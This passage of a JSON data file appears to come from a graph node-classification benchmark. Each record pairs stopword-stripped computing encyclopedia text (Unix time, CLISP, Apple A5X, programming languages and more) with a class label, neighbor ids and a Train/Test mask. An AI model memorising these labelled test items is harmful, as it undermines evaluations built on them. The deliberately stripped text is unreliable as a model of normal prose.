replacing occurrences term variable formula_6 formula_2 term formula_7 scala supports type declarations object members allows type object member depend value another member called path-dependent type example following program text defines scala trait witness used implement singleton pattern trait witness trait witness declares member assigned type value member value assigned value type t. following programm text defines object booleanwitness instance trait witness object booleanwitness defines type boolean value value true example executing system.out.println booleanwitness.value prints true console object booleanwitness extends witness let formula_16 type specifically record type objects member formula_17 type formula_1 example object booleanwitness assigned dependent intersection type formula_19 reasoning follows object booleanwitness member assigned type boolean value since boolean type object booleanwitness type formula_20 additionally object booleanwitness member value assigned value true type boolean since value booleanwitness.t boolean object booleanwitness type formula_21 overall object booleanwitness intersection type formula_22 therefore presenting self-reference dependency object booleanwitness dependent intersection type formula_19 alternatively minimalistic example described using dependent record types comparison dependent intersection types dependent record types constitute strictly specialized type theoretic concept intersection type family denoted formula_24 dependent type type formula_2 may depend term variable formula_6 particular term formula_7 type formula_24 term formula_29 type formula_1 term formula_7 type formula_32 notion also called implicit pi type observing argument formula_29 kept term level",
    "neighbors": [
      4101,
      10246,
      5783,
      11674,
      10145,
      5796,
      5677,
      9780,
      11574,
      6087,
      2011,
      4572,
      6239,
      10729,
      10991,
      3702,
      7671,
      3705,
      9466,
      2556,
      5885
    ],
    "mask": "Test"
  },
  {
    "node_id": 8252,
    "label": 7,
    "text": "Distributed_data_flow:distributed data flow distributed data flow also abbreviated distributed flow refers set events distributed application protocol distributed data flows serve purpose analogous variables method parameters programming languages java represent state stored communicated layer software unlike variables parameters represent unit state resides single location distributed flows dynamic distributed simultaneously appear multiple locations within network time distributed flows natural way modeling semantics inner workings certain classes distributed systems particular distributed data flow abstraction used convenient way expressing high-level logical relationships parts distributed protocols distributed data flow satisfies following informal properties formally represent event distributed flow quadruple form x k v x location e.g. network address physical node event occurs time happens k version sequence number identifying particular event v value represents event payload e.g. arguments passed method call distributed flow possibly infinite set quadruples satisfies following three formal properties addition flows number additional properties",
    "neighbors": [
      4417,
      545,
      6403,
      8929,
      5029,
      8262,
      5677,
      1197,
      7855
    ],
    "mask": "None"
  },
  {
    "node_id": 8253,
    "label": 3,
    "text": "Apple_A5X:apple a5x apple a5x 32-bit system-on-a-chip soc designed apple inc. introduced launch third generation ipad march 7 2012 high performance variant apple a5 apple claims twice graphics performance a5 superseded iphone 5 5c a6 chip fourth generation ipad a6x chip software updates ipad 3rd generation ended 2016 thus ceasing support chip a5x features dual-core arm cortex-a9 cpu 1 ghz quad-core powervr sgx543mp4 gpu clocked 250 mhz apple doubled size a5x memory interface comparison a5 including memory interface subsystem four 32-bit wide lp-ddr2 memory controllers done provide sufficient bandwidth high pixel count third generation ipad retina display unlike a4 a5 a5x covered metal heat spreader package-on-package pop assembly earlier chips ram sat top soc however a5x ram bundled together soc instead a5x sits one side motherboard twin samsung lp ddr2 sdram soldered directly side motherboard a5x manufactured 45 nm process samsung silicon die size increased drastically compared a5 165 mm 3.1 times larger 53.3 mm die area original a4",
    "neighbors": [
      7170,
      10755,
      9732,
      1549,
      5647,
      8720,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      1074,
      8754,
      9784,
      8250,
      576,
      7745,
      1090,
      7235,
      7747,
      2635,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      99,
      8806,
      3691,
      8812,
      11374,
      2673,
      6258,
      10357,
      6264,
      10361,
      4220,
      7292,
      2686,
      638,
      6783,
      7806,
      10365,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      1170,
      7830,
      6807,
      5784,
      1177,
      666,
      4251,
      3228,
      5786,
      7833,
      2207,
      4258,
      7842,
      7844,
      4773,
      11430,
      171,
      2735,
      3248,
      9913,
      4283,
      3772,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      9928,
      4810,
      3790,
      1744,
      4821,
      3286,
      9430,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      10548,
      11062,
      7991,
      1849,
      11066,
      2363,
      6971,
      2365,
      2366,
      9022,
      11257,
      1346,
      8003,
      10562,
      6981,
      838,
      7496,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      1377,
      9063,
      10602,
      3948,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      2439,
      392,
      3977,
      6023,
      6539,
      7052,
      398,
      1428,
      3483,
      4508,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      4569,
      8665,
      2524,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 8254,
    "label": 4,
    "text": "Partimage:partimage partimage disk cloning utility linux/unix environments partimage save partitions many formats disk image utilities partimage useful number situations commonly encountered network administrators well advanced computer users maintain systems last stable release 2010 since one partimage authors worked fsarchiver broader functionality partimage common uses partimage follows windows users partimage includes experimental support ntfs partimage supports common linux file systems found many linux distributions including debian live distros ping knoppix systemrescuecd notable features include compression disk image files support backup/restore network file server data encryption partimage uses newt gui partimage limited cloning partitions supported filesystem types includes ext2 ext3 reiserfs fat12 fat16 fat16b fat32 hpfs jfs xfs ufs hfs ntfs partimage support ext4 btrfs",
    "neighbors": [
      7555,
      1801,
      6797,
      3086,
      2193,
      2197,
      2199,
      8857,
      9762,
      3366,
      3629,
      7983,
      8114,
      823,
      4154,
      8772,
      7244,
      3420,
      9693,
      5612,
      10476,
      246,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8255,
    "label": 7,
    "text": "Numecent:numecent numecent irvine california-based software technology company develops software used deliver native software applications premises server farm cloud patented technology called cloudpaging based virtualization allows delivery pre-virtualized software instructions user machine on-demand instructions executed soon received numecent roots started 1999 darpa project u.c irvine arthur hitomi one three scientists formed endeavors technology inc. irvine california-based software development company project connected computers mobile devices internet work groups developed application delivery technology support groups 2000 tadpole technology plc maker mobile computing devices software purchased endeavors 2004 tadpole also acquired stream theory california-based software company developed technology deploying application software internet across enterprise networks focus gaming market two companies constituted genesis technology later became known cloudpaging 2007 patenting application streaming technology tadpole decided focus solely developing business 2008 tadpole changed name endeavors technologies inc 2009 osman kent sold 3dlabs creative labs 2002 acquired endeavors formed numecent holdings company emerged end-user computing market technology two former employees started united kingdom boston ma-based spinoff called software2 help universities deploy microsoft windows applications physical machines cloud 2012 numecent publicly launched osman kent ceo 2013 numecent software2 announced partnership numecent flagship cloudpaging product application jukebox suite deployed 40 universities uk 2015 application jukebox suite dropped product name favor standalone trademarked name cloudpaging march 2015 numecent announced hiring former broadcom executive vice president tom lagatta ceo osman kent promoted role executive chairman january 2017 co-founder cto arthur hitomi became president ceo company ’ main product cloudpaging enables existing windows applications cloudpage pcs run perform act natively installed cloudpaging server conjunction cloudpaging player allows software delivered cloud pre-virtualizing software encrypted divided small fragments company calls pages pages delivered one time executed client computer software also employs statistical modeling dynamically predict pages sent first cloudpaging makes desktop applications fully available faster less disk space required applications also run computer disconnected internet network outage august 2013 company announced service presently branded cloudpaging cdn introduced launch native-as-a-service naas offered conjunction amazon web services multi-tenant cloud via self-hosting option applications virtualized licenses cloudified made available delivery end users without rewrite recompile underlying source code march 2017 company announced android offering named cloudpaging android utilities cloudpaging technology reduce impact application install sizes android devices numecent announced first spin technology approxy 2012 approxy offers white-label delivery service game developers publishers approxy ’ system reduces delay players allowing start playing seconds download additional code necessary play retrieved piece-by-piece october 2014 numecent announced bringing approxy group back numecent parent attempt attract game industry customers required access cloudpaging source code numecent named gartner cool vendor cloud computing 2013 february 2012 company closed series funding round 2m may 2013 numecent closed series b funding 13.6m t-venture deutsche telecom venture funding arm november 2015 company closed series c funding round 15.5m",
    "neighbors": [
      7248,
      4194,
      8466,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 8256,
    "label": 2,
    "text": "Open_Network_Install_Environment:open network install environment open network install environment onie open source install environment acts enhanced boot loader utilizing facilities linux/busybox environment small linux operating system allows end-users channel partners install network operating system part data center provisioning similar way servers provisioned operating system choice onie enables network switch hardware suppliers distributors resellers manage operations based small number hardware stock keeping unit skus turn creates economies scale manufacturing distribution stocking return merchandise authorization rma enabling ecosystem network hardware operating system alternatives",
    "neighbors": [
      516,
      7983,
      2802,
      823,
      3007
    ],
    "mask": "Test"
  },
  {
    "node_id": 8257,
    "label": 0,
    "text": "David_Andreoff_Evans:david andreoff evans david andreoff evans born 1948 st. louis scientist field computational linguistics best known research indexing using natural language processing ontology learning especially medical informatics evans attended stanford university receiving ph.d. computational linguistics 1982 attended inter-university center japanese language studies 1979 faculty carnegie mellon university 1983 1996 founded computational linguistics program laboratory computational linguistics 1986 supported grant digital equipment corporation led research project computational-linguistic approaches indexing retrieval text clarit september 1992 clarit spun-out carnegie-mellon company called claritech technology used index papers politician h. john heinz iii claritech became research development subsidiary justsystems name changed clairvoyance corporation 1996 becoming justsystems evans research 2007 made many contributions field computational linguistics information retrieval authoring books many research papers holder 25 us patents evans elected fellow american college medical informatics 1999",
    "neighbors": [
      1890,
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 8258,
    "label": 9,
    "text": "CLISP:clisp computing clisp implementation programming language common lisp originally developed bruno haible michael stoll atari st. today supports unix microsoft windows operating systems clisp includes interpreter bytecode compiler debugger socket interface high-level foreign language interface strong internationalization support two object systems common lisp object system clos metaobject protocol mop written c common lisp part gnu project free software available terms gnu general public license gpl haible originally intend distribute clisp gpl well-publicised email exchange richard stallman eventually agreed issue stake whether clisp derivative work gnu readline library clisp extremely portable running almost unix-based operating systems well microsoft windows although interpreting bytecode usually slower running compiled native binaries always major issue especially applications like web development i/o bottleneck clisp also easier set popular foss common lisps sbcl paul graham used clisp run software viaweb startup viaweb early web application portions still exist yahoo stores base yahoo shopping conrad barski land lisp uses clisp-specific functions textbook exercises",
    "neighbors": [
      10752,
      2050,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      4122,
      8735,
      3618,
      8226,
      2105,
      6201,
      6717,
      8771,
      8262,
      5703,
      10822,
      1613,
      9299,
      3674,
      3675,
      7267,
      8293,
      3176,
      2666,
      2667,
      8304,
      5751,
      7805,
      2180,
      9865,
      6797,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      1731,
      7880,
      5833,
      8908,
      205,
      7896,
      10463,
      7392,
      7904,
      10464,
      11488,
      5360,
      5361,
      8435,
      2804,
      8436,
      6906,
      4865,
      3334,
      263,
      3336,
      6919,
      1301,
      10012,
      3869,
      2335,
      802,
      7983,
      10547,
      311,
      6969,
      11083,
      1365,
      3413,
      2392,
      6493,
      10083,
      6502,
      9579,
      1394,
      5492,
      3446,
      4992,
      2438,
      11654,
      7562,
      4493,
      1939,
      6556,
      6047,
      1952,
      4516,
      10149,
      5031,
      1448,
      9128,
      5555,
      9148,
      10687,
      5569,
      6594,
      4550,
      11218,
      8147,
      10712,
      2010,
      3034,
      3051,
      5612,
      9714,
      11255,
      2045,
      4606
    ],
    "mask": "Train"
  },
  {
    "node_id": 8259,
    "label": 4,
    "text": "Separation_of_protection_and_security:separation protection security computer sciences separation protection security design choice wulf et al identified protection mechanism security policy therefore making protection-security distinction particular case separation mechanism policy principle adoption distinction computer architecture usually means protection provided fault tolerance mechanism hardware/firmware kernel whereas operating system applications implement security policies design security policies rely therefore protection mechanisms additional cryptography techniques major hardware approach security protection use hierarchical protection domains prominent example approach ring architecture supervisor mode user mode approach adopts policy already lower levels hardware/firmware/kernel restricting rest system rely therefore choice distinguish protection security overall architecture design implies rejection hierarchical approach favour another one capability-based addressing examples models protection security separation include access matrix ucla data secure unix take-grant filter separation found models like high-water mark bell–lapadula original revisited information flow strong dependency constraints",
    "neighbors": [
      4423,
      8551,
      745,
      4299,
      9932,
      9677,
      7983,
      6162,
      5363,
      1013,
      8150,
      11262,
      10968,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8260,
    "label": 2,
    "text": "Unix_time:unix time unix time also known posix time unix epoch time system describing point time number seconds elapsed since 00:00:00 thursday 1 january 1970 coordinated universal time utc minus leap seconds every day treated contains exactly seconds leap seconds subtracted since epoch used widely unix-like many operating systems file formats however unix time true representation utc leap second utc unix time second came unix time may checked unix systems typing command line systems unix time stored signed 32-bit integer largest value recorded 2 − 1 03:14:07 tuesday 19 january 2038 utc following second clock wrap around negative −2 20:45:52 friday 13 december 1901 utc referred year 2038 problem two layers encoding make unix time first layer encodes point time scalar real number represents number seconds passed since 00:00:00utc thursday 1 january 1970 second layer encodes number sequence bits decimal digits standard utc article labels days using gregorian calendar counts times within day hours minutes seconds examples also show international atomic time tai another time scheme uses seconds displayed format utc every day exactly seconds long gradually losing synchronization earth rotation rate roughly one second per year unix time single signed number increments every second without requiring calculations determine year month day month hour minute required intelligibility humans unix epoch time 00:00:00utc 1 january 1970 problem definition utc exist current form 1972 issue discussed brevity remainder section uses iso 8601 date time format unix epoch 1970-01-01t00:00:00z unix time number zero unix epoch increases exactly per day since epoch thus 2004-09-16t00:00:00z days epoch represented unix time number × extended backwards epoch using negative numbers thus 1957-10-04t00:00:00z days epoch represented unix time number × within day unix time number calculated preceding paragraph midnight utc 00:00:00z increases exactly 1 per second since midnight thus 2004-09-16t17:55:43.54z seconds since midnight first day example represented unix time number dates epoch number still increases thus becoming less negative time moves forward unix time based epoch sometimes referred epoch time scheme means normal utc day duration seconds unix time number changes continuous manner across midnight example end day used examples time representations progress follows leap second occurs utc day exactly seconds long unix time number always increases exactly day experiences discontinuity end day negative leap second yet occurred unix time number would jump 1 start next day positive leap second end day occurs every year half average unix time number increases continuously next day leap second end leap second jumps back 1 returning start next day example happened strictly conforming posix.1 systems end 1998 unix time numbers repeated second immediately following positive leap second unix time number thus ambiguous refer either instant middle leap second instant one second later half second midnight utc theoretical case negative leap second occurs ambiguity caused instead range unix time numbers refer point time unix clock often implemented different type positive leap second handling associated network time protocol ntp yields system conform posix standard see section concerning ntp details dealing periods encompass utc leap second difference two unix time numbers equal duration seconds period corresponding points time common computational technique however leap seconds occur calculations give wrong answer applications level accuracy required necessary consult table leap seconds dealing unix times often preferable use different time encoding suffer problem unix time number easily converted back utc taking quotient modulus unix time number modulo quotient number days since epoch modulus number seconds since midnight utc day given unix time number ambiguous due positive leap second algorithm interprets time midnight never generates time leap second given unix time number invalid due negative leap second generates equally invalid utc time conditions significant necessary consult table leap seconds detect commonly mills-style unix clock implemented leap second handling synchronous change unix time number time number initially decreases leap occurred leaps correct time 1 second leap makes implementation easier described mills paper happens across positive leap second decoded properly paying attention leap second state variable unambiguously indicates whether leap performed yet state variable change synchronous leap similar situation arises negative leap second second skipped slightly late briefly system shows nominally impossible time number detected time_del state corrected type system unix time number violates posix around types leap second collecting leap second state variable along time number allows unambiguous decoding correct posix time number generated desired full utc time stored suitable format decoding logic required cope style unix clock would also correctly decode hypothetical posix-conforming clock using interface would achieved indicating time_ins state entirety inserted leap second indicating time_wait entirety following second repeating seconds count requires synchronous leap second handling probably best way express utc time unix clock form via unix interface underlying clock fundamentally untroubled leap seconds another much rarer non-conforming variant unix time keeping involves encoding tai rather utc linux systems configured way tai leap seconds every tai day exactly 86400 seconds long encoding actually pure linear count seconds elapsed since 1970-01-01t00:00:00tai makes time interval arithmetic much easier time values systems suffer ambiguity strictly conforming posix systems ntp-driven systems systems necessary consult table leap seconds correctly convert utc pseudo-unix-time representation resembles manner time zone tables must consulted convert civil time iana time zone database includes leap second information sample code available source uses information convert tai-based time stamps local time conversion also runs definitional problems prior 1972 commencement current form utc see section utc basis tai-based system despite superficial resemblance unix time encodes times values differ several seconds posix time values simple mathematical relationship utc mandated posix unix time number represented form capable representing numbers applications number simply represented textually string decimal digits raising trivial additional problems however certain binary representations unix times particularly significant unix codice_1 data type represents point time many platforms signed integer traditionally 32bits see directly encoding unix time number described preceding section 32 bits means covers range 136 years total minimum representable date friday 1901-12-13 maximum representable date tuesday 2038-01-19 one second 03:14:07utc 2038-01-19 representation overflow milestone anticipated mixture amusement dread—see year 2038 problem newer operating systems codice_1 widened 64 bits expands times representable approximately 293 billion years directions twenty times present age universe per direction originally controversy whether unix codice_1 signed unsigned unsigned range future would doubled postponing 32-bit overflow 68 years however would incapable representing times prior epoch consensus codice_1 signed usual practice software development platform version 6 qnx operating system unsigned 32-bit codice_1 though older releases used signed type posix open group unix specifications include c standard library includes time types functions defined codice_6 header file iso c standard states codice_1 must arithmetic type mandate specific type encoding posix requires codice_1 integer type mandate signed unsigned unix tradition directly representing non-integer unix time numbers binary fractions instead times sub-second precision represented using composite data types consist two integers first codice_1 integral part unix time second fractional part time number millionths codice_10 billionths codice_11 structures provide decimal-based fixed-point data format useful applications trivial convert others present form utc leap seconds defined 1 january 1972 onwards prior since 1 january 1961 older form utc occasional time steps non-integer numbers seconds also utc second slightly longer si second periodically changed continuously approximate earth rotation prior 1961 utc prior 1958 widespread atomic timekeeping eras approximation gmt based directly earth rotation used instead atomic timescale precise definition unix time encoding utc uncontroversial applied present form utc unix epoch predating start form utc affect use era number days 1 january 1970 unix epoch 1 january 1972 start utc question number days significant unix time meaning unix time values i.e. prior 1 january 1972 precisely defined basis unix times best understood unspecified approximation utc computers era rarely clocks set sufficiently accurately provide meaningful sub-second timestamps case unix time suitable way represent times prior 1972 applications requiring sub-second precision applications must least define form ut gmt use possibility ending use leap seconds civil time considered likely means execute change define new time scale called international time initially matches utc thereafter leap seconds thus remaining constant offset tai happens likely unix time prospectively defined terms new time scale instead utc uncertainty whether occur makes prospective unix time less predictable already utc simply leap seconds result would unix-like operating systems codice_12 command print set current time earliest versions unix time 32-bit integer incrementing rate 60 hz rate system clock hardware early unix systems value 60 hz still appears software interfaces result epoch also differed current value first edition unix programmer manual dated 3 november 1971 defines unix time time since 00:00:00 1 january 1971 measured sixtieths second user manual also commented chronologically-minded user note 2**32 sixtieths second 2.5 years limited range epoch redefined rate changed 1 hz epoch set present value 1 january 1970 00:00:00 utc yielded range 136 years though half range past see discussion signedness indicated definition quoted unix time scale originally intended simple linear representation time elapsed since epoch however consideration details time scales implicitly assumed simple linear time scale already available agreed upon first edition manual definition even specify time zone used several later problems including complexity present definition result unix time defined gradually usage rather fully defined outset posix.1 written question arose precisely define codice_1 face leap seconds posix committee considered whether unix time remain intended linear count seconds since epoch expense complexity conversions civil time representation civil time expense inconsistency around leap seconds computer clocks era sufficiently precisely set form precedent one way posix committee swayed arguments complexity library functions firmly defined unix time simple manner terms elements utc time definition simple even encompass entire leap year rule gregorian calendar would make 2100 leap year 2001 edition posix.1 rectified faulty leap year rule definition unix time retained essential definition unix time encoding utc rather linear time scale since mid-1990s computer clocks routinely set sufficient precision matter commonly set using utc-based definition unix time resulted considerable complexity unix implementations network time protocol execute steps unix time number whenever leap seconds occur unix enthusiasts history holding time_t parties pronounced time tea parties celebrate significant values unix time number directly analogous new year celebrations occur change year many calendars use unix time spread practice celebrating milestones usually time values round numbers decimal celebrated following unix convention viewing codice_1 values decimal among groups round binary numbers also celebrated +2 occurred 13:37:04 utc saturday 10 january 2004 events celebrate typically described n seconds since unix epoch inaccurate discussed due handling leap seconds unix time number seconds elapsed since unix epoch slightly greater unix time number times later epoch vernor vinge novel deepness sky describes spacefaring trading civilization thousands years future still uses unix epoch programmer-archaeologist responsible finding maintaining usable code mature computer systems first believes epoch refers time man first walked moon realizes 0-second one humankind first computer operating systems",
    "neighbors": [
      5156,
      8260,
      10344,
      4396,
      3309,
      823,
      1775,
      8975,
      5492,
      5397,
      3350,
      2199,
      7734,
      9557,
      8186,
      6492,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 8261,
    "label": 1,
    "text": "No-force:no-force no-force policy used transaction control database theory term no-force refers disk pages related actual database object modified no-force policy transaction commits changes made actual objects required written disk in-place forced record changes must still preserved commit time ensure transaction durable record typically written sequential transaction log actual changes database objects changes written later time frequently changed objects no-force policy allows updates merged reduce number write operations actual database object no-force policy also reduces seek time required commit mostly sequential write operations transaction log rather requiring disk seek many distinct database objects commit",
    "neighbors": [
      4376,
      5953
    ],
    "mask": "Train"
  },
  {
    "node_id": 8262,
    "label": 9,
    "text": "Programming_language:programming language programming language formal language comprises set instructions produce various kinds output programming languages used computer programming implement algorithms programming languages consist instructions computers programmable machines use set specific instructions rather general programming languages early ones preceded invention digital computer first probably automatic flute player described 9th century brothers musa baghdad islamic golden age since early 1800s programs used direct behavior machines jacquard looms music boxes player pianos programs machines player piano scrolls produce different behavior response different inputs conditions thousands different programming languages created created every year many programming languages written imperative form i.e. sequence operations perform languages use declarative form i.e desired result specified achieve description programming language usually split two components syntax form semantics meaning languages defined specification document example c programming language specified iso standard languages perl dominant implementation treated reference languages basic language defined standard extensions taken dominant implementation common programming language notation writing programs specifications computation algorithm authors restrict term programming language languages express possible algorithms traits often considered important constitutes programming language include markup languages like xml html troff define structured data usually considered programming languages programming languages may however share syntax markup languages computational semantics defined xslt example turing complete language entirely using xml syntax moreover latex mostly used structuring documents also contains turing complete subset term computer language sometimes used interchangeably programming language however usage terms varies among authors including exact scope one usage describes programming languages subset computer languages similarly languages used computing different goal expressing computer programs generically designated computer languages instance markup languages sometimes referred computer languages emphasize meant used programming another usage regards programming languages theoretical constructs programming abstract machines computer languages subset thereof runs physical computers finite hardware resources john c. reynolds emphasizes formal specification languages much programming languages languages intended execution also argues textual even graphical input formats affect behavior computer programming languages despite fact commonly turing-complete remarks ignorance programming language concepts reason many flaws input formats early computers colossus programmed without help stored program modifying circuitry setting banks physical controls slightly later programs could written machine language programmer writes instruction numeric form hardware execute directly example instruction add value two memory location might consist 3 numbers opcode selects add operation two memory locations programs decimal binary form read punched cards paper tape magnetic tape toggled switches front panel computer machine languages later termed first-generation programming languages 1gl next step development so-called second-generation programming languages 2gl assembly languages still closely tied instruction set architecture specific computer served make program much human-readable relieved programmer tedious error-prone address calculations first high-level programming languages third-generation programming languages 3gl written 1950s early high-level programming language designed computer plankalkül developed german z3 konrad zuse 1943 1945 however implemented 1998 2000 john mauchly short code proposed 1949 one first high-level languages ever developed electronic computer unlike machine code short code statements represented mathematical expressions understandable form however program translated machine code every time ran making process much slower running equivalent machine code university manchester alick glennie developed autocode early 1950s programming language used compiler automatically convert language machine code first code compiler developed 1952 mark 1 computer university manchester considered first compiled high-level programming language second autocode developed mark 1 r. a. brooker 1954 called mark 1 autocode brooker also developed autocode ferranti mercury 1950s conjunction university manchester version edsac 2 devised d. f. hartley university cambridge mathematical laboratory 1961 known edsac 2 autocode straight development mercury autocode adapted local circumstances noted object code optimisation source-language diagnostics advanced time contemporary separate thread development atlas autocode developed university manchester atlas 1 machine 1954 fortran invented ibm john backus first widely used high-level general purpose programming language functional implementation opposed design paper still popular language high-performance computing used programs benchmark rank world fastest supercomputers another early programming language devised grace hopper us called flow-matic developed univac remington rand period 1955 1959 hopper found business data processing customers uncomfortable mathematical notation early 1955 team wrote specification english programming language implemented prototype flow-matic compiler became publicly available early 1958 substantially complete 1959 flow-matic major influence design cobol since direct descendant aimaco actual use time increased use high-level languages introduced requirement low-level programming languages system programming languages languages varying degrees provide facilities assembly languages high-level languages used perform tasks require direct access hardware facilities still provide higher-level control structures error-checking period 1960s late 1970s brought development major language paradigms use languages spawned descendants modern programming languages count least one ancestry 1960s 1970s also saw considerable debate merits structured programming whether programming languages designed support edsger dijkstra famous 1968 letter published communications acm argued goto statements eliminated higher level programming languages 1980s years relative consolidation c++ combined object-oriented systems programming united states government standardized ada systems programming language derived pascal intended use defense contractors japan elsewhere vast sums spent investigating so-called fifth-generation languages incorporated logic programming constructs functional languages community moved standardize ml lisp rather inventing new paradigms movements elaborated upon ideas invented previous decades one important trend language design programming large-scale systems 1980s increased focus use modules large-scale organizational units code modula-2 ada ml developed notable module systems 1980s often wedded generic programming constructs rapid growth internet mid-1990s created opportunities new languages perl originally unix scripting tool first released 1987 became common dynamic websites java came used server-side programming bytecode virtual machines became popular commercial settings promise write run anywhere ucsd pascal popular time early 1980s developments fundamentally novel rather refinements many existing languages paradigms although syntax often based c family programming languages programming language evolution continues industry research current directions include security reliability verification new kinds modularity mixins delegates aspects database integration microsoft linq fourth-generation programming languages 4gl computer programming languages aim provide higher level abstraction internal computer hardware details 3gls fifth-generation programming languages 5gl programming languages based solving problems using constraints given program rather using algorithm written programmer programming languages primitive building blocks description data processes transformations applied like addition two numbers selection item collection primitives defined syntactic semantic rules describe structure meaning respectively programming language surface form known syntax programming languages purely textual use sequences text including words numbers punctuation much like written natural languages hand programming languages graphical nature using visual relationships symbols specify program syntax language describes possible combinations symbols form syntactically correct program meaning given combination symbols handled semantics either formal hard-coded reference implementation since languages textual article discusses textual syntax programming language syntax usually defined using combination regular expressions lexical structure backus–naur form grammatical structure simple grammar based lisp grammar specifies following following examples well-formed token sequences grammar codice_1 codice_2 codice_3 syntactically correct programs semantically correct many syntactically correct programs nonetheless ill-formed per language rules may depending language specification soundness implementation result error translation execution cases programs may exhibit undefined behavior even program well-defined within language may still meaning intended person wrote using natural language example may possible assign meaning grammatically correct sentence sentence may false following c language fragment syntactically correct performs operations semantically defined operation codice_4 meaning value complex type codice_5 defined value codice_6 null pointer type declaration first line omitted program would trigger error undefined variable p compilation however program would still syntactically correct since type declarations provide semantic information grammar needed specify programming language classified position chomsky hierarchy syntax programming languages specified using type-2 grammar i.e. context-free grammars languages including perl lisp contain constructs allow execution parsing phase languages constructs allow programmer alter behavior parser make syntax analysis undecidable problem generally blur distinction parsing execution contrast lisp macro system perl codice_7 blocks may contain general computations c macros merely string replacements require code execution term semantics refers meaning languages opposed form syntax static semantics defines restrictions structure valid texts hard impossible express standard syntactic formalisms compiled languages static semantics essentially include semantic rules checked compile time examples include checking every identifier declared used languages require declarations labels arms case statement distinct many important restrictions type like checking identifiers used appropriate context e.g adding integer function name subroutine calls appropriate number type arguments enforced defining rules logic called type system forms static analyses like data flow analysis may also part static semantics newer programming languages like java c definite assignment analysis form data flow analysis part static semantics data specified machine must instructed perform operations data example semantics may define strategy expressions evaluated values manner control structures conditionally execute statements dynamic semantics also known execution semantics language defines various constructs language produce program behavior many ways defining execution semantics natural language often used specify execution semantics languages commonly used practice significant amount academic research went formal semantics programming languages allow execution semantics specified formal manner results field research seen limited application programming language design implementation outside academia type system defines programming language classifies values expressions types manipulate types interact goal type system verify usually enforce certain level correctness programs written language detecting certain incorrect operations decidable type system involves trade-off rejects many incorrect programs also prohibit correct albeit unusual programs order bypass downside number languages type loopholes usually unchecked casts may used programmer explicitly allow normally disallowed operation different types typed languages type system used type check programs number languages usually functional ones infer types relieving programmer need write type annotations formal design study type systems known type theory language typed specification every operation defines types data operation applicable example data represented codice_8 string many programming languages dividing number string meaning executed invalid operation may detected program compiled static type checking rejected compiler compilation error message may detected program running dynamic type checking resulting run-time exception many languages allow function called exception handler handle exception example always return -1 result special case typed languages single-typed languages often scripting markup languages rexx sgml one data type–—most commonly character strings used symbolic numeric data contrast untyped language assembly languages allows operation performed data generally sequences bits various lengths high-level untyped languages include bcpl tcl varieties forth practice languages considered typed type theory verifying rejecting operations modern languages offer degree typing many production languages provide means bypass subvert type system trading type-safety finer control program execution see casting static typing expressions types determined prior program executed typically compile-time example 1 2+2 integer expressions passed function expects string stored variable defined hold dates statically typed languages either manifestly typed type-inferred first case programmer must explicitly write types certain textual positions example variable declarations second case compiler infers types expressions declarations based context mainstream statically typed languages c++ c java manifestly typed complete type inference traditionally associated less mainstream languages haskell ml however many manifestly typed languages support partial type inference example c++ java c infer types certain limited cases additionally programming languages allow types automatically converted types example int used program expects float dynamic typing also called latent typing determines type-safety operations run time words types associated run-time values rather textual expressions type-inferred languages dynamically typed languages require programmer write explicit type annotations expressions among things may permit single variable refer values different types different points program execution however type errors automatically detected piece code actually executed potentially making debugging difficult lisp smalltalk perl python javascript ruby examples dynamically typed languages weak typing allows value one type treated another example treating string number occasionally useful also allow kinds program faults go undetected compile time even run time strong typing prevents program faults attempt perform operation wrong type value raises error strongly typed languages often termed type-safe safe alternative definition weakly typed refers languages perl javascript permit large number implicit type conversions javascript example expression codice_9 implicitly converts codice_10 number conversion succeeds even codice_10 codice_12 codice_13 codice_14 string letters implicit conversions often useful mask programming errors strong static generally considered orthogonal concepts usage literature differs use term strongly typed mean strongly statically typed even confusingly mean simply statically typed thus c called strongly typed weakly statically typed may seem odd professional programmers c could weakly statically typed however notice use generic pointer void* pointer allow casting pointers pointers without needing explicit cast extremely similar somehow casting array bytes kind datatype c without using explicit cast codice_15 codice_16 programming languages associated core library sometimes known 'standard library especially included part published language standard conventionally made available implementations language core libraries typically include definitions commonly used algorithms data structures mechanisms input output line language core library differs language language cases language designers may treat library separate entity language however language core library often treated part language users language specifications even require library made available implementations indeed languages designed meanings certain syntactic constructs even described without referring core library example java string literal defined instance codice_17 class similarly smalltalk anonymous function expression block constructs instance library codice_18 class conversely scheme contains multiple coherent subsets suffice construct rest language library macros language designers even bother say portions language must implemented language constructs must implemented parts library programming languages share properties natural languages related purpose vehicles communication syntactic form separate semantics showing language families related languages branching one another artificial constructs also differ fundamental ways languages evolved usage significant difference programming language fully described studied entirety since precise finite definition contrast natural languages changing meanings given users different communities constructed languages also artificial languages designed ground specific purpose lack precise complete semantic definition 